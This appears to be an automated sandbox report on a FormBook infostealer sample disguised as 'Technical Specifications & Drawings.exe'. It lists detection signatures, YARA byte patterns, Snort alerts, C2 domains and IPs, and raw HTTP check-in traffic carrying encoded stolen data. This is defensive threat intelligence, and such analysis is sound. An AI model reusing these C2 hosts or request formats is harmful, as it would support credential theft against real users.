Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Technical Specifications & Drawings.exe

Overview

General Information

Sample Name:Technical Specifications & Drawings.exe
Analysis ID:680337
MD5:9b94f751e8cc145058db9f428c2ad571
SHA1:f12af989efe2b3b11e4784899ca4c6794da17879
SHA256:893a0b655917a18e5886348b39f6023fa851cf3d89e5b8709219ad3d2766fa97
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Technical Specifications & Drawings.exe (PID: 6080 cmdline: "C:\Users\user\Desktop\Technical Specifications & Drawings.exe" MD5: 9B94F751E8CC145058DB9F428C2AD571)
    • Technical Specifications & Drawings.exe (PID: 5084 cmdline: C:\Users\user\Desktop\Technical Specifications & Drawings.exe MD5: 9B94F751E8CC145058DB9F428C2AD571)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 1896 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.tomoptique.fr/02pi/"], "decoy": ["M3tfGJmJRxnXx2v38A==", "m4b8szAh7fn1GFTQt32C+uKxPpY=", "aq5+I6igUigQzHUz", "4lHg1pN4fbZQ8Hg5", "pZgq+XdYRJZGtZpXb/gobxk=", "ngmngHIN+PJf3danjt0=", "aWHnw0nyXCgQzHUz", "Qa+KQe7PL5g83V8q", "lX0/3lMZHyGWQPyVm46Q9eKxPpY=", "syPESuXcWyQQzHUz", "ULeDOo1rfqvVcCs=", "COFEArOnRS4JMdemgP8DLQqSNA==", "OqdvdWhJyOqVPg==", "ANt3czoMin1DUZcstDUe", "rKFuM+S9pv/riVlgxBgU", "xzso55N63kL1Ltanjt0=", "hu2RdTMU7NZL0ZeqvEGH7OKxPpY=", "phmUZhkO/d6ZTx6mWMQ=", "Wj2oYxTKjw68jMwazrQW", "lv2aiTsU6N7OqJUTBj2Y+uKxPpY=", "5L0q4IlGEpRTlSYstDUe", "FvK8ah8qZ6vVcCs=", "abtoVRsE4tE6sNIRwiGUA+KxPpY=", "y8Gdr3IxeuRASI4Jy+8KaA==", "N7Em3E0iRrJy3danjt0=", "OBWvoWlwJbCSGdanjt0=", "kHkzKtyb51bk65cS+g==", "BVkF/LV3JBY+srgvS9U=", "fd2hjkcgFnNDp9ilV9U=", "edamUMWCAMievvdJA4WztmMX", "h/qtrJyTWSJL/PxJHlLzWAg=", "kWe7Ro0IyOqVPg==", "QrAe3YpmUGlDSXfy/wMvSTmfNg==", "ZWHgx4I+k/iuEUaNFmBIl0c0Hiy9", "iPlzLaJyecBx3tanjt0=", "Fo9S+XIwpyB1byMstDUe", "SkLiwnZYrCYQrGBeaKYibhE=", "XcysZNaTMwWxq2OmTRULYA==", "aNu4UwbkA17EoBLXgP02mT00Hiy9", "Mo8yuSKja+g9", "607Ad/rXD5aMLt2xfIZ2e1NnoZ4=", "pXk25GIbEhR4+i13QkI+STmfNg==", "uysGFdukYWM8/QtMBEyc/uKxPpY=", "fmH+9tKRYRD/oVthN3aztmMX", "TbWDRDb0g9Ciq2OmTRULYA==", "tqF7KKme4y7gKNanjt0=", "6+CEgnJVgQLuirED1LIRexM=", "YFTOiPnMSI9rJw==", "k/yeppGCO9fBv/c8", "Kqk+FsSThJHxaSMiNY+ztmMX", "HezQg/rXDY51FtXgrAd8lkv0sCmtHTtGnw==", "GWjsvjb3CHtxvjlKOYiztmMX", "QCnkguifwkk/mCkstDUe", "zTm3ZwwBFoJjoigstDUe", "4VQ4+q5U0aUIx2v38A==", "7c038ndW7jMCtjw=", "8d6NjFQhZqvVcCs=", "xqJFQfyja+g9", "iHDxwkgzyOqVPg==", "OSu/mIgimCB8X9MWJixbvWOuqdoDwaU=", "Sq1WTzwwyOqVPg==", "huZUE5ZZNtqY/wlhy+8KaA==", "g27epFQnkhaSqe1sRB2ztmMX", "b9WRoY5wEffprIkPy+8KaA=="]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x65b1:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1dbe0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa53f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x16de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x16be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x16691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x16e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa10a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x158ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xae52:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1c837:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1d94a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x19289:$sqlite3step: 68 34 1C 7B E1
    • 0x193bc:$sqlite3step: 68 34 1C 7B E1
    • 0x192cb:$sqlite3text: 68 38 2A 90 C5
    • 0x19413:$sqlite3text: 68 38 2A 90 C5
    • 0x192e2:$sqlite3blob: 68 53 D8 7F 8C
    • 0x19435:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.0.Technical Specifications & Drawings.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.0.Technical Specifications & Drawings.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x57b1:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1cde0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x973f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x15fe7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        4.0.Technical Specifications & Drawings.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x15de5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15891:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15ee7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1605f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x930a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x14aac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa052:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ba37:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1cb4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.0.Technical Specifications & Drawings.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18489:$sqlite3step: 68 34 1C 7B E1
        • 0x185bc:$sqlite3step: 68 34 1C 7B E1
        • 0x184cb:$sqlite3text: 68 38 2A 90 C5
        • 0x18613:$sqlite3text: 68 38 2A 90 C5
        • 0x184e2:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18635:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 3 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.367.23.226.11949803802031412 08/08/22-12:28:44.161490
          SID:2031412
          Source Port:49803
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.367.23.226.11949803802031453 08/08/22-12:28:44.161490
          SID:2031453
          Source Port:49803
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.367.223.117.7249809802031449 08/08/22-12:28:49.631208
          SID:2031449
          Source Port:49809
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.367.223.117.7249809802031412 08/08/22-12:28:49.631208
          SID:2031412
          Source Port:49809
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.367.223.117.7249809802031453 08/08/22-12:28:49.631208
          SID:2031453
          Source Port:49809
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.367.23.226.11949803802031449 08/08/22-12:28:44.161490
          SID:2031449
          Source Port:49803
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Technical Specifications & Drawings.exeVirustotal: Detection: 32%Perma Link
          Source: Technical Specifications & Drawings.exeReversingLabs: Detection: 21%
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.kirchhoff-darryl.com/02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_Avira URL Cloud: Label: malware
          Source: http://www.tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_Avira URL Cloud: Label: malware
          Source: http://www.mexc-event-partner.site/02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_Avira URL Cloud: Label: malware
          Source: http://www.esandcraic.com/02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_Avira URL Cloud: Label: malware
          Source: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91Avira URL Cloud: Label: malware
          Source: http://www.mexc-event-partner.site/02pi/Avira URL Cloud: Label: malware
          Source: www.tomoptique.fr/02pi/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: boshi-eg.onlineVirustotal: Detection: 12%Perma Link
          Source: mexc-event-partner.siteVirustotal: Detection: 5%Perma Link
          Machine Learning detection for sample
          Source: Technical Specifications & Drawings.exeJoe Sandbox ML: detected
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.tomoptique.fr/02pi/"], "decoy": ["M3tfGJmJRxnXx2v38A==", "m4b8szAh7fn1GFTQt32C+uKxPpY=", "aq5+I6igUigQzHUz", "4lHg1pN4fbZQ8Hg5", "pZgq+XdYRJZGtZpXb/gobxk=", "ngmngHIN+PJf3danjt0=", "aWHnw0nyXCgQzHUz", "Qa+KQe7PL5g83V8q", "lX0/3lMZHyGWQPyVm46Q9eKxPpY=", "syPESuXcWyQQzHUz", "ULeDOo1rfqvVcCs=", "COFEArOnRS4JMdemgP8DLQqSNA==", "OqdvdWhJyOqVPg==", "ANt3czoMin1DUZcstDUe", "rKFuM+S9pv/riVlgxBgU", "xzso55N63kL1Ltanjt0=", "hu2RdTMU7NZL0ZeqvEGH7OKxPpY=", "phmUZhkO/d6ZTx6mWMQ=", "Wj2oYxTKjw68jMwazrQW", "lv2aiTsU6N7OqJUTBj2Y+uKxPpY=", "5L0q4IlGEpRTlSYstDUe", "FvK8ah8qZ6vVcCs=", "abtoVRsE4tE6sNIRwiGUA+KxPpY=", "y8Gdr3IxeuRASI4Jy+8KaA==", "N7Em3E0iRrJy3danjt0=", "OBWvoWlwJbCSGdanjt0=", "kHkzKtyb51bk65cS+g==", "BVkF/LV3JBY+srgvS9U=", "fd2hjkcgFnNDp9ilV9U=", "edamUMWCAMievvdJA4WztmMX", "h/qtrJyTWSJL/PxJHlLzWAg=", "kWe7Ro0IyOqVPg==", "QrAe3YpmUGlDSXfy/wMvSTmfNg==", "ZWHgx4I+k/iuEUaNFmBIl0c0Hiy9", "iPlzLaJyecBx3tanjt0=", "Fo9S+XIwpyB1byMstDUe", "SkLiwnZYrCYQrGBeaKYibhE=", "XcysZNaTMwWxq2OmTRULYA==", "aNu4UwbkA17EoBLXgP02mT00Hiy9", "Mo8yuSKja+g9", "607Ad/rXD5aMLt2xfIZ2e1NnoZ4=", "pXk25GIbEhR4+i13QkI+STmfNg==", "uysGFdukYWM8/QtMBEyc/uKxPpY=", "fmH+9tKRYRD/oVthN3aztmMX", "TbWDRDb0g9Ciq2OmTRULYA==", "tqF7KKme4y7gKNanjt0=", "6+CEgnJVgQLuirED1LIRexM=", "YFTOiPnMSI9rJw==", "k/yeppGCO9fBv/c8", "Kqk+FsSThJHxaSMiNY+ztmMX", "HezQg/rXDY51FtXgrAd8lkv0sCmtHTtGnw==", "GWjsvjb3CHtxvjlKOYiztmMX", "QCnkguifwkk/mCkstDUe", "zTm3ZwwBFoJjoigstDUe", "4VQ4+q5U0aUIx2v38A==", "7c038ndW7jMCtjw=", "8d6NjFQhZqvVcCs=", "xqJFQfyja+g9", "iHDxwkgzyOqVPg==", "OSu/mIgimCB8X9MWJixbvWOuqdoDwaU=", "Sq1WTzwwyOqVPg==", "huZUE5ZZNtqY/wlhy+8KaA==", "g27epFQnkhaSqe1sRB2ztmMX", "b9WRoY5wEffprIkPy+8KaA=="]}
          Source: Technical Specifications & Drawings.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Technical Specifications & Drawings.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Technical Specifications & Drawings.exe, Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 109.234.162.62 80
          Source: C:\Windows\explorer.exeDomain query: www.mexc-event-partner.site
          Source: C:\Windows\explorer.exeDomain query: www.gzkanglongkeji.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.155.208.43 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.107.80 80
          Source: C:\Windows\explorer.exeNetwork Connect: 67.23.226.119 80
          Source: C:\Windows\explorer.exeDomain query: www.kirchhoff-darryl.com
          Source: C:\Windows\explorer.exeNetwork Connect: 67.223.117.72 80
          Source: C:\Windows\explorer.exeDomain query: www.boshi-eg.online
          Source: C:\Windows\explorer.exeDomain query: www.tomoptique.fr
          Source: C:\Windows\explorer.exeDomain query: www.esandcraic.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.tomoptique.fr/02pi/
          Source: Joe Sandbox ViewASN Name: O2SWITCHFR O2SWITCHFR
          Source: Joe Sandbox ViewASN Name: BEKKOAMEBEKKOAMEINTERNETINCJP BEKKOAMEBEKKOAMEINTERNETINCJP
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ HTTP/1.1Host: www.kirchhoff-darryl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ HTTP/1.1Host: www.tomoptique.frConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=4npjF3s9G6uWNp4ceBGqcNUcjkX96JEG8J4d3OAuWw45Kxpl9gSb2BHY5Eg4Nc6InaukRaYVJuT4y0aleUHPUlqgoOBFmRDZHQ==&wRtdp=ETVPg0_ HTTP/1.1Host: www.boshi-eg.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ HTTP/1.1Host: www.esandcraic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 67.223.117.72 67.223.117.72
          Source: Joe Sandbox ViewIP Address: 67.23.226.119 67.23.226.119
          Source: global trafficHTTP traffic detected: POST /02pi/ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.mexc-event-partner.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mexc-event-partner.site/02pi/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 5a 4c 30 3d 44 76 79 6b 59 68 57 49 4d 35 4c 42 4a 6a 4d 50 6a 54 75 63 62 57 6d 55 44 47 6a 73 66 32 46 4f 72 53 64 48 57 70 34 47 61 33 74 68 66 6a 38 75 79 5f 54 78 59 47 53 44 75 33 62 4c 39 42 7a 62 39 47 57 70 74 79 46 63 62 75 70 69 6f 68 6f 32 6d 5a 51 56 77 5a 7e 45 62 35 42 51 71 64 43 78 66 72 6f 78 42 49 62 70 39 44 47 75 43 31 5a 30 69 52 7a 49 4d 53 7a 7a 32 78 43 77 6d 76 61 52 4e 31 7a 49 62 44 50 49 4d 5f 62 72 31 33 36 6b 6d 7a 39 35 4e 67 61 62 55 51 4a 31 6b 50 63 62 41 55 71 63 37 55 45 52 32 73 48 51 55 66 46 65 5a 46 4f 7a 35 4e 4e 35 7a 68 6b 4a 6b 50 6b 35 57 53 37 6a 28 47 52 42 41 71 49 7a 64 74 78 42 54 72 46 39 36 4c 77 2d 57 32 63 52 66 32 63 57 74 31 28 5f 4b 43 54 63 65 35 74 43 76 64 59 53 45 5f 6f 36 59 31 59 2d 41 79 45 43 4f 36 6e 73 66 6e 71 72 39 4d 35 34 6d 44 79 6f 39 47 71 66 4f 48 6c 58 37 74 41 41 7a 32 51 4a 71 51 41 63 33 52 49 4f 45 2d 42 64 71 4a 48 6c 69 37 6b 68 41 6c 45 4f 6d 68 6a 72 35 37 6b 71 6e 4e 55 6f 6e 4e 66 4f 51 70 48 43 58 79 67 71 66 58 67 68 77 34 71 52 56 47 6c 61 38 50 50 57 5a 63 4c 6c 7e 38 65 44 72 52 57 79 48 4a 59 70 30 53 4a 41 56 59 6c 76 6d 33 33 33 6c 6f 4f 2d 6b 6b 54 2d 63 69 57 52 79 36 54 35 7a 51 79 71 52 6f 44 4c 6d 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ZL0=DvykYhWIM5LBJjMPjTucbWmUDGjsf2FOrSdHWp4Ga3thfj8uy_TxYGSDu3bL9Bzb9GWptyFcbupioho2mZQVwZ~Eb5BQqdCxfroxBIbp9DGuC1Z0iRzIMSzz2xCwmvaRN1zIbDPIM_br136kmz95NgabUQJ1kPcbAUqc7UER2sHQUfFeZFOz5NN5zhkJkPk5WS7j(GRBAqIzdtxBTrF96Lw-W2cRf2cWt1(_KCTce5tCvdYSE_o6Y1Y-AyECO6nsfnqr9M54mDyo9GqfOHlX7tAAz2QJqQAc3RIOE-BdqJHli7khAlEOmhjr57kqnNUonNfOQpHCXygqfXghw4qRVGla8PPWZcLl~8eDrRWyHJYp0SJAVYlvm333loO-kkT-ciWRy6T5zQyqRoDLmA).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:28:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:28:49 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 